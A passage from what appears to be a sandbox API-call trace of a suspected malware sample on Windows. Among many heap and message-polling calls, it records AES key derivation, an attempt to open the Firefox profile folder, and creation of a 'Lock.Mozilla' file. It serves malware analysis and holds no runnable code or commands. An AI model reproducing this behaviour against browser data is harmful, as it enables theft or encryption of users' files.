wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.459] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0138.459] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.459] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0138.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa528, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0138.459] CryptDeriveKey (in: hProv=0x9bea28, Algid=0x6601, hBaseData=0x9a4a40, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a43c0) returned 1 [0138.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.460] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.460] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0138.460] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.460] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0138.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0138.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0138.460] CryptDestroyHash (hHash=0x9a4a40) returned 1 [0138.460] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0138.461] GetLastError () returned 0x5 [0138.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0138.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0138.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0138.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0138.462] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0138.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0138.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0138.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0138.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0138.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0138.462] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.mozilla"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0138.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0138.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0138.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0138.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0138.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0138.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0138.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0138.491] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0138.491] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0138.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0138.491] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0138.492] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0138.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0138.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0138.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0138.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0138.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0138.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f58 [0138.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0138.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0138.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0138.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0138.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0138.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0138.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0138.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0138.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0138.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0138.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0138.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0138.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0138.531] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0138.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0138.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0138.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0138.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0138.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 